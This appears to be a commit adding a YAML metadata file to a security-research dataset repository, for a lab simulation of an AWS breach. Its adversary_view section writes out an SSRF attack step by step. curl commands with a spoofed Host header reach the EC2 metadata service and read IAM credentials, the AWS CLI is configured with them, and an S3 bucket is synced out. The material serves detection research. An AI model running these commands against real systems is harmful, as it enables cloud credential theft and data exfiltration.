khulnasoft
commited on
Commit
•
d7c8a21
1
Parent(s):
7945a0d
Create datasets/atomic/_metadata/SDAWS-200914011940.yaml
Browse files
datasets/atomic/_metadata/SDAWS-200914011940.yaml
ADDED
@@ -0,0 +1,75 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
title: AWS Cloud Bank Breach S3
|
2 |
+
id: SDAWS-200914011940
|
3 |
+
contributors:
|
4 |
+
- Roberto Rodriguez @Cyb3rWard0g
|
5 |
+
creation_date: 2020/09/13
|
6 |
+
modification_date: 2020/09/13
|
7 |
+
platform:
|
8 |
+
- AWS
|
9 |
+
type: atomic
|
10 |
+
tags:
|
11 |
+
- EC2 Proxy Abuse
|
12 |
+
- S3 Data Exfiltration
|
13 |
+
description: This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.
|
14 |
+
attack_mappings:
|
15 |
+
- technique: T1078
|
16 |
+
sub-technique: "004"
|
17 |
+
tactics:
|
18 |
+
- TA0001
|
19 |
+
- TA0003
|
20 |
+
- TA0004
|
21 |
+
- TA0005
|
22 |
+
- technique: T1530
|
23 |
+
sub-technique:
|
24 |
+
tactics:
|
25 |
+
- TA0009
|
26 |
+
notebooks:
|
27 |
+
files:
|
28 |
+
- type: cloud
|
29 |
+
link: https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/aws/collection/ec2_proxy_s3_exfiltration.zip
|
30 |
+
simulation:
|
31 |
+
environment: https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3
|
32 |
+
tools:
|
33 |
+
- type: Cloud Formation Templates
|
34 |
+
name: AWS CLI
|
35 |
+
module: Exfiltration
|
36 |
+
script: https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3
|
37 |
+
permissions_required:
|
38 |
+
- user
|
39 |
+
adversary_view: |-
|
40 |
+
> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/ -H "Host:169.254.169.254"
|
41 |
+
MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 >
|
42 |
+
|
43 |
+
> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 -H "Host:169.254.169.254"
|
44 |
+
{
|
45 |
+
"Code" : "Success",
|
46 |
+
"LastUpdated" : "2020-09-14T00:49:26Z",
|
47 |
+
"Type" : "AWS-HMAC",
|
48 |
+
"AccessKeyId" : "ASIA5FLZVX4OPVKKVBMX",
|
49 |
+
"SecretAccessKey" : "aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03",
|
50 |
+
"Token" : "TOKEN",
|
51 |
+
"Expiration" : "2020-09-14T07:10:27Z"
|
52 |
+
}
|
53 |
+
|
54 |
+
> aws configure --profile erratic
|
55 |
+
AWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX
|
56 |
+
AWS Secret Access Key [None]: aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03
|
57 |
+
Default region name [None]: us-east-1
|
58 |
+
Default output format [None]: json
|
59 |
+
|
60 |
+
> echo aws_session_token = "TOKEN" >> ~/.aws/credentials
|
61 |
+
|
62 |
+
> aws s3 ls --profile erratic
|
63 |
+
2020-09-13 20:00:32 mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642
|
64 |
+
2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a
|
65 |
+
|
66 |
+
> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
|
67 |
+
2020-09-13 20:00:26 89 ring.txt
|
68 |
+
|
69 |
+
> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
|
70 |
+
2020-09-13 20:00:26 89 ring.txt
|
71 |
+
|
72 |
+
> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . --profile erratic
|
73 |
+
download: s3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to ./ring.txt
|
74 |
+
references:
|
75 |
+
- https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/cloud_breach_s3
|